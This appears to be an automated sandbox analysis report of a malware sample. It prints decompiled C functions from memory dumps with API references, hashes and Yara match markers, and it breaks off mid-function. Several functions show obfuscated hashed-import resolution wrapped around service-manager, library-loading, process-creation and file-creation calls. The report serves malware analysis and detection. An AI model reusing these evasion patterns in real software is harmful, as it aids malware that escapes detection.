                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: ErrorLast$Read$QueryVirtual
                                              • String ID:
                                              • API String ID: 4108280708-0
                                              • Opcode ID: bf404f711d3082d50f5bbd0f7f711224f62efa474e87bb40448eead53f7fc99f
                                              • Instruction ID: a489c81f2b48b45f7abe8d82c2fa530717afe034d23ef7191f16fae001b152d3
                                              • Opcode Fuzzy Hash: bf404f711d3082d50f5bbd0f7f711224f62efa474e87bb40448eead53f7fc99f
                                              • Instruction Fuzzy Hash: 02415E71600619EBEB10CF59DC80B99B7A8FF483A5F04416AED0ADB705D731E961CBE0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E1000A35A(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                              				char _v8;
                                              				intOrPtr _v12;
                                              				int _v20;
                                              				int _t35;
                                              				int _t38;
                                              				int _t42;
                                              				intOrPtr* _t44;
                                              				int _t47;
                                              				short* _t49;
                                              				intOrPtr _t50;
                                              				intOrPtr _t54;
                                              				int _t55;
                                              				int _t59;
                                              				char* _t62;
                                              
                                              				_t62 = _a8;
                                              				if(_t62 == 0) {
                                              					L5:
                                              					return 0;
                                              				}
                                              				_t50 = _a12;
                                              				if(_t50 == 0) {
                                              					goto L5;
                                              				}
                                              				if( *_t62 != 0) {
                                              					E1000476A( &_v20, _a16);
                                              					_t35 = _v20;
                                              					__eflags =  *(_t35 + 0xa8);
                                              					if( *(_t35 + 0xa8) != 0) {
                                              						_t38 = E1000A179( *_t62 & 0x000000ff,  &_v20);
                                              						__eflags = _t38;
                                              						if(_t38 == 0) {
                                              							__eflags = _a4;
                                              							_t59 = 1;
                                              							_t42 = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                              							__eflags = _t42;
                                              							if(_t42 != 0) {
                                              								L21:
                                              								__eflags = _v8;
                                              								if(_v8 != 0) {
                                              									_t54 = _v12;
                                              									_t31 = _t54 + 0x70;
                                              									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                              									__eflags =  *_t31;
                                              								}
                                              								return _t59;
                                              							}
                                              							L20:
                                              							_t44 = E10005EC6();
                                              							_t59 = _t59 | 0xffffffff;
                                              							__eflags = _t59;
                                              							 *_t44 = 0x2a;
                                              							goto L21;
                                              						}
                                              						_t59 = _v20;
                                              						__eflags =  *(_t59 + 0x74) - 1;
                                              						if( *(_t59 + 0x74) <= 1) {
                                              							L15:
                                              							__eflags = _t50 -  *(_t59 + 0x74);
                                              							L16:
                                              							if(__eflags < 0) {
                                              								goto L20;
                                              							}
                                              							__eflags = _t62[1];
                                              							if(_t62[1] == 0) {
                                              								goto L20;
                                              							}
                                              							L18:
                                              							_t59 =  *(_t59 + 0x74);
                                              							goto L21;
                                              						}
                                              						__eflags = _t50 -  *(_t59 + 0x74);
                                              						if(__eflags < 0) {
                                              							goto L16;
                                              						}
                                              						__eflags = _a4;
                                              						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
                                              						_t59 = _v20;
                                              						__eflags = _t47;
                                              						if(_t47 != 0) {
                                              							goto L18;
                                              						}
                                              						goto L15;
                                              					}
                                              					_t55 = _a4;
                                              					__eflags = _t55;
                                              					if(_t55 != 0) {
                                              						 *_t55 =  *_t62 & 0x000000ff;
                                              					}
                                              					_t59 = 1;
                                              					goto L21;
                                              				}
                                              				_t49 = _a4;
                                              				if(_t49 != 0) {
                                              					 *_t49 = 0;
                                              				}
                                              				goto L5;
                                              			}

                                              APIs
                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1000A38E
                                              • __isleadbyte_l.LIBCMT ref: 1000A3BC
                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,100020F6,00000000,?,100020F6,?,?,?), ref: 1000A3EA
                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,100020F6,00000000,?,100020F6,?,?,?), ref: 1000A420
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                              • String ID:
                                              • API String ID: 3058430110-0
                                              • Opcode ID: d9634a8e026aa07a820c9bcf7b7f3b6f286b4ef525d2eb9816761caa15114c1e
                                              • Instruction ID: 9d1cf0849eee1a075b18554553a91368e22c05569ceb8c6a927f46b954fbfb1a
                                              • Opcode Fuzzy Hash: d9634a8e026aa07a820c9bcf7b7f3b6f286b4ef525d2eb9816761caa15114c1e
                                              • Instruction Fuzzy Hash: 6231B035A00256AFEB11CF65C848BAE7BE5FF822D0F124628F850871A4E770E9D1DB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 20%
                                              			E10006610(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
                                              				void* __edi;
                                              				void* __ebp;
                                              				void* _t25;
                                              				void* _t28;
                                              				intOrPtr _t29;
                                              				void* _t30;
                                              				intOrPtr* _t31;
                                              				void* _t33;
                                              
                                              				_t30 = __esi;
                                              				_t27 = __ebx;
                                              				_t35 = _a28;
                                              				_t29 = _a8;
                                              				if(_a28 != 0) {
                                              					_push(_a28);
                                              					_push(_a24);
                                              					_push(_t29);
                                              					_push(_a4);
                                              					E10006C38(__ebx, _t29, __esi, _t35);
                                              					_t33 = _t33 + 0x10;
                                              				}
                                              				_t36 = _a40;
                                              				_push(_a4);
                                              				if(_a40 != 0) {
                                              					_push(_a40);
                                              				} else {
                                              					_push(_t29);
                                              				}
                                              				E100042B0(_t28);
                                              				_push(_t30);
                                              				_t31 = _a32;
                                              				_push( *_t31);
                                              				_push(_a20);
                                              				_push(_a16);
                                              				_push(_t29);
                                              				E10006E99(_t27, _t31, _t36);
                                              				_push(0x100);
                                              				_push(_a36);
                                              				 *((intOrPtr*)(_t29 + 8)) =  *((intOrPtr*)(_t31 + 4)) + 1;
                                              				_push( *((intOrPtr*)(_a24 + 0xc)));
                                              				_push(_a20);
                                              				_push(_a12);
                                              				_push(_t29);
                                              				_push(_a4);
                                              				_t25 = E10006402(_t27, _t29, _t31, _t36);
                                              				if(_t25 != 0) {
                                              					E10004280(_t25, _t29);
                                              					return _t25;
                                              				}
                                              				return _t25;
                                              			}












                                              APIs
                                              • ___BuildCatchObject.LIBCMT ref: 10006627
                                                • Part of subcall function 10006C38: ___AdjustPointer.LIBCMT ref: 10006C81
                                              • _UnwindNestedFrames.LIBCMT ref: 1000663E
                                              • ___FrameUnwindToState.LIBCMT ref: 10006650
                                              • CallCatchBlock.LIBCMT ref: 10006674
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                              • String ID:
                                              • API String ID: 2633735394-0
                                              • Opcode ID: 38cfbb4d2267087fb04e53c3657a99f3c08a1c5c1ee859ea4b28d79f0814a6ce
                                              • Instruction ID: 929118807ddd2d015550d77d84a67e82c7ccc00f3a1cd5c495e14181e13c7b39
                                              • Opcode Fuzzy Hash: 38cfbb4d2267087fb04e53c3657a99f3c08a1c5c1ee859ea4b28d79f0814a6ce
                                              • Instruction Fuzzy Hash: D6014C72000109BBEF02CF55DC01EDA3BBAFF5C790F228119F91862124C732E961DBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • StringFromGUID2.OLE32(?,?,00000027), ref: 100032CF
                                              • GetModuleFileNameW.KERNEL32(10000000,?,00000104,?,10002572,1000D260,80000002,3C5A3040), ref: 100032E3
                                              Strings
                                              • Recipe (.recipe) Property Handler, xrefs: 100032A6
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: FileFromModuleNameString
                                              • String ID: Recipe (.recipe) Property Handler
                                              • API String ID: 1402647516-129706424
                                              • Opcode ID: 7ed536aff0d5137a22396f0237d134f3e1b2848668901a19bc3cda47405f2b17
                                              • Instruction ID: 6f8015bcf9db97dc62130dd9dbc2d8b03967e6a2f427fd85d2ca8f80d55362ab
                                              • Opcode Fuzzy Hash: 7ed536aff0d5137a22396f0237d134f3e1b2848668901a19bc3cda47405f2b17
                                              • Instruction Fuzzy Hash: 7AF01231510718AFD310DFA8C844E96B7E8EF09754F00851BF689D7610E7B0A544CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E10001980(void* _a4) {
                                              				void* _t15;
                                              				void* _t16;
                                              				void* _t20;
                                              				intOrPtr _t23;
                                              				void* _t30;
                                              				signed int _t32;
                                              				void* _t34;
                                              				void* _t35;
                                              
                                              				_t34 = _a4;
                                              				if(_t34 == 0) {
                                              					return _t15;
                                              				}
                                              				if( *((intOrPtr*)(_t34 + 0x10)) != 0) {
                                              					_t30 =  *(_t34 + 4);
                                              					 *((intOrPtr*)( *((intOrPtr*)( *_t34 + 0x28)) + _t30))(_t30, 0, 0);
                                              				}
                                              				if( *(_t34 + 8) == 0) {
                                              					L10:
                                              					_t16 =  *(_t34 + 4);
                                              					if(_t16 != 0) {
                                              						VirtualFree(_t16, 0, 0x8000);
                                              					}
                                              					return HeapFree(GetProcessHeap(), 0, _t34);
                                              				} else {
                                              					_t32 = 0;
                                              					if( *((intOrPtr*)(_t34 + 0xc)) <= 0) {
                                              						L8:
                                              						_t20 =  *(_t34 + 8);
                                              						if(_t20 != 0) {
                                              							VirtualFree(_t20, 0, 0x8000);
                                              						}
                                              						goto L10;
                                              					} else {
                                              						goto L5;
                                              					}
                                              					do {
                                              						L5:
                                              						_t23 =  *((intOrPtr*)( *(_t34 + 8) + _t32 * 4));
                                              						if(_t23 != 0) {
                                              							 *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x24))))(_t23,  *((intOrPtr*)(_t34 + 0x28)));
                                              							_t35 = _t35 + 8;
                                              						}
                                              						_t32 = _t32 + 1;
                                              					} while (_t32 <  *((intOrPtr*)(_t34 + 0xc)));
                                              					goto L8;
                                              				}
                                              			}












                                              APIs
                                              • VirtualFree.KERNEL32(?,00000000,00008000,00000000,?,10001DC4,00000000,100013CB,EC8B55CC,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50), ref: 100019DC
                                              • VirtualFree.KERNEL32(?,00000000,00008000,00000000,?,10001DC4,00000000,100013CB,EC8B55CC,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50), ref: 100019F1
                                              • GetProcessHeap.KERNEL32(00000000,EC8B55CC,00000000,?,10001DC4,00000000,100013CB,EC8B55CC,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000), ref: 100019FA
                                              • HeapFree.KERNEL32(00000000,?,10001DC4), ref: 10001A01
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: Free$HeapVirtual$Process
                                              • String ID:
                                              • API String ID: 3505259878-0
                                              • Opcode ID: f0dbf08bf0ac1d416156738cb98c565ad35b7fd76a7272c1614ca254b19f3500
                                              • Instruction ID: 46a294df184e67868fe018602a73977999fd3160e39f49d8b46b80fbf7fdd7f8
                                              • Opcode Fuzzy Hash: f0dbf08bf0ac1d416156738cb98c565ad35b7fd76a7272c1614ca254b19f3500
                                              • Instruction Fuzzy Hash: 1E115A31600711ABE620DBA5CC89F9673E8EB48BD1F108818F59AD7294CB70F841CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Executed Functions

                                              C-Code - Quality: 62%
                                              			E002A2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t30;
                                              				void* _t39;
                                              				signed int _t41;
                                              				signed int _t42;
                                              
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(0);
                                              				_push(0);
                                              				E002A602B(_t30);
                                              				_v12 = 0x5e3c;
                                              				_t41 = 0x63;
                                              				_v12 = _v12 / _t41;
                                              				_t42 = 0x2f;
                                              				_v12 = _v12 / _t42;
                                              				_v12 = _v12 ^ 0x000064be;
                                              				_v8 = 0x74da;
                                              				_v8 = _v8 | 0xfefeeaea;
                                              				_v8 = _v8 >> 0xc;
                                              				_v8 = _v8 ^ 0x000fb531;
                                              				E002B07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
                                              				_t39 = OpenSCManagerW(0, 0, _a16); // executed
                                              				return _t39;
                                              			}










                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002A29DC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2111128932.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000008.00000002.2111119916.00000000002A0000.00000004.00000001.sdmp
                                              • Associated: 00000008.00000002.2111149588.00000000002BC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: ManagerOpen
                                              • String ID: <^
                                              • API String ID: 1889721586-3203995635
                                              • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                              • Instruction ID: b228479d0592d7262c3096c52193cb454ef3b2f27795b4812acf56c9c2036a05
                                              • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                              • Instruction Fuzzy Hash: 81016D72A00108BFEB14DF95DC4A8DFBFB6EF45350F108088F508A6250D7B65F619B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 58%
                                              			E002AC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                              				signed int _v8;
                                              				unsigned int _v12;
                                              				intOrPtr _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				intOrPtr _v28;
                                              				void* _t29;
                                              				intOrPtr* _t33;
                                              				void* _t34;
                                              
                                              				E002A602B(_t29);
                                              				_v28 = 0x4fe02f;
                                              				_v24 = 0x232390;
                                              				_v20 = 0xf8460;
                                              				_v16 = 0;
                                              				_v12 = 0xf625;
                                              				_v12 = _v12 >> 6;
                                              				_v12 = _v12 >> 0xa;
                                              				_v12 = _v12 + 0xffffcc6f;
                                              				_v12 = _v12 ^ 0xffffa5b6;
                                              				_v8 = 0xe5cd;
                                              				_v8 = _v8 + 0xffffae4d;
                                              				_v8 = _v8 | 0xf8bbefe7;
                                              				_v8 = _v8 ^ 0xf8bbcc9a;
                                              				_t33 = E002B07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
                                              				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
                                              				return _t34;
                                              			}













                                              APIs
                                              • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 002AC762
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2111128932.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000008.00000002.2111119916.00000000002A0000.00000004.00000001.sdmp
                                              • Associated: 00000008.00000002.2111149588.00000000002BC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: FolderPath
                                              • String ID: /O
                                              • API String ID: 1514166925-1923427199
                                              • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                              • Instruction ID: 638f793660a12b4e98ad273969b03f6d27cee91c911f0030f67d6bc36e7f7be7
                                              • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                              • Instruction Fuzzy Hash: 091133B290122DBBCB25DF95DC498EFBFB8EF05754F108188F90962210D7714B659BE0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 82%
                                              			E002A1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				void* _t33;
                                              				struct HINSTANCE__* _t40;
                                              				signed int _t42;
                                              
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				E002A602B(_t33);
                                              				_v16 = _v16 & 0x00000000;
                                              				_v24 = 0x1b2eda;
                                              				_v20 = 0x33a3b7;
                                              				_v12 = 0x98c;
                                              				_v12 = _v12 + 0xb426;
                                              				_v12 = _v12 + 0x5beb;
                                              				_t42 = 0x63;
                                              				_v12 = _v12 / _t42;
                                              				_v12 = _v12 ^ 0x00000fce;
                                              				_v8 = 0x120e;
                                              				_v8 = _v8 + 0xfffffcb8;
                                              				_v8 = _v8 + 0xffffefaa;
                                              				_v8 = _v8 >> 5;
                                              				_v8 = _v8 ^ 0x07ff9a02;
                                              				E002B07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
                                              				_t40 = LoadLibraryW(_a12); // executed
                                              				return _t40;
                                              			}












                                              APIs
                                              • LoadLibraryW.KERNEL32(0033A3B7), ref: 002A1096
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2111128932.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000008.00000002.2111119916.00000000002A0000.00000004.00000001.sdmp
                                              • Associated: 00000008.00000002.2111149588.00000000002BC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID: [
                                              • API String ID: 1029625771-3431493590
                                              • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                              • Instruction ID: 99c32fce244875e02a0d857f7dda1aecb172f19e077cd5849940a0b9e51e4473
                                              • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                              • Instruction Fuzzy Hash: 4D015BB6D01308BBDF04DFA4C94A5DEBBB1AB54318F108188E51466291D7B19B649B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002A4859() {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t22;
                                              
                                              				_v12 = 0xafe2;
                                              				_v12 = _v12 * 0x42;
                                              				_v12 = _v12 + 0xffffdd89;
                                              				_v12 = _v12 ^ 0x002d198d;
                                              				_v8 = 0x5b09;
                                              				_v8 = _v8 | 0xa1ea9544;
                                              				_v8 = _v8 * 0x12;
                                              				_v8 = _v8 ^ 0x6283d9c1;
                                              				E002B07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
                                              				ExitProcess(0);
                                              			}







                                              APIs
                                              • ExitProcess.KERNELBASE(00000000), ref: 002A48B7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2111128932.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000008.00000002.2111119916.00000000002A0000.00000004.00000001.sdmp
                                              • Associated: 00000008.00000002.2111149588.00000000002BC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID: [
                                              • API String ID: 621844428-1822564810
                                              • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                              • Instruction ID: 0f2d7f1d1e070b4223c4fc5f9274b61d5f7acc887405883fdf3895e95ab027cc
                                              • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                              • Instruction Fuzzy Hash: BEF017B0A15209FBDB04CFE8CA9699EFFB9EB40301F20818CE444B7290E7B15F509B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 66%
                                              			E002B4F7D(void* __ecx, void* __edx, void* _a4) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t17;
                                              				int _t24;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E002A602B(_t17);
                                              				_v12 = 0xddd8;
                                              				_v12 = _v12 * 0x48;
                                              				_v12 = _v12 ^ 0x003e66d8;
                                              				_v8 = 0xcb35;
                                              				_v8 = _v8 ^ 0x7b88573c;
                                              				_v8 = _v8 * 0x59;
                                              				_v8 = _v8 ^ 0xf27e4a21;
                                              				E002B07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
                                              				_t24 = CloseHandle(_a4); // executed
                                              				return _t24;
                                              			}








                                              APIs
                                              • CloseHandle.KERNELBASE(003E66D8), ref: 002B4FE2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2111128932.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000008.00000002.2111119916.00000000002A0000.00000004.00000001.sdmp
                                              • Associated: 00000008.00000002.2111149588.00000000002BC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID: {#lm
                                              • API String ID: 2962429428-1564096886
                                              • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                              • Instruction ID: 65df1366edb39fc32f30dd1a193b2fe8e22f9bc6f5c60b47db0dd0e3de1d45ac
                                              • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                              • Instruction Fuzzy Hash: 7EF037B081120CFFDB04DFA4D98689EBFBAEB40340F208199E804AB250D7715B50AB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 21%
                                              			E002B976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t34;
                                              				int _t39;
                                              				struct _PROCESS_INFORMATION* _t48;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_t48 = __edx;
                                              				_push(0);
                                              				_push(_a68);
                                              				_push(0);
                                              				_push(_a60);
                                              				_push(_a56);
                                              				_push(_a52);
                                              				_push(0);
                                              				_push(_a44);
                                              				_push(_a40);
                                              				_push(0);
                                              				_push(0);
                                              				_push(_a28);
                                              				_push(_a24);
                                              				_push(_a20);
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E002A602B(_t34);
                                              				_v12 = 0xaff9;
                                              				_v12 = _v12 | 0xcee54bd1;
                                              				_v12 = _v12 + 0x6ed6;
                                              				_v12 = _v12 ^ 0xcee61221;
                                              				_v8 = 0x6229;
                                              				_v8 = _v8 ^ 0x42aa9f31;
                                              				_v8 = _v8 >> 2;
                                              				_v8 = _v8 ^ 0x10aad83f;
                                              				E002B07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
                                              				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
                                              				return _t39;
                                              			}









                                              APIs
                                              • CreateProcessW.KERNEL32(002A591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,002A591A), ref: 002B9816
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2111128932.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000008.00000002.2111119916.00000000002A0000.00000004.00000001.sdmp
                                              • Associated: 00000008.00000002.2111149588.00000000002BC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                              • Instruction ID: d07b36f6dd2f4118dd9b7593cfd5843a8c0f02beb87261563ada88c7efbecc89
                                              • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                              • Instruction Fuzzy Hash: D211D372800148BBDF1A9F92DC0ACDF7F3AEF89750F104048FA1452120D6728A60EBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 31%
                                              			E002AB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t32;
                                              				void* _t38;
                                              				long _t47;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a48);
                                              				_t47 = __edx;
                                              				_push(_a44);
                                              				_push(_a40);
                                              				_push(_a36);
                                              				_push(_a32);
                                              				_push(_a28);
                                              				_push(_a24);
                                              				_push(0);
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(0);
                                              				E002A602B(_t32);
                                              				_v8 = 0xfd14;
                                              				_v8 = _v8 >> 4;
                                              				_v8 = _v8 * 0x7a;
                                              				_v8 = _v8 >> 9;
                                              				_v8 = _v8 ^ 0x00002bef;
                                              				_v12 = 0x4f26;
                                              				_v12 = _v12 | 0xe7e97f76;
                                              				_v12 = _v12 ^ 0xe7e94dbb;
                                              				E002B07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
                                              				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
                                              				return _t38;
                                              			}









                                              APIs
                                              • CreateFileW.KERNELBASE(002B0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,002B0668,?,?,?,?), ref: 002AB5FD
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2111128932.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000008.00000002.2111119916.00000000002A0000.00000004.00000001.sdmp
                                              • Associated: 00000008.00000002.2111149588.00000000002BC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                              • Instruction ID: 537f052e03b1853710b083748c3c9d98745d96ae799ab36f45355c58eedb3b4d
                                              • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                              • Instruction Fuzzy Hash: 8111B272801248BBDF16DF95DD06CEEBF7AFF89314F148198FA1862120D3729A60EB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 54%
                                              			E002B981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t22;
                                              				void* _t28;
                                              				void* _t34;
                                              				long _t37;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a16);
                                              				_t34 = __edx;
                                              				_t37 = __ecx;
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E002A602B(_t22);
                                              				_v12 = 0xe68;
                                              				_v12 = _v12 * 0x39;
                                              				_v12 = _v12 ^ 0xd1b1d871;
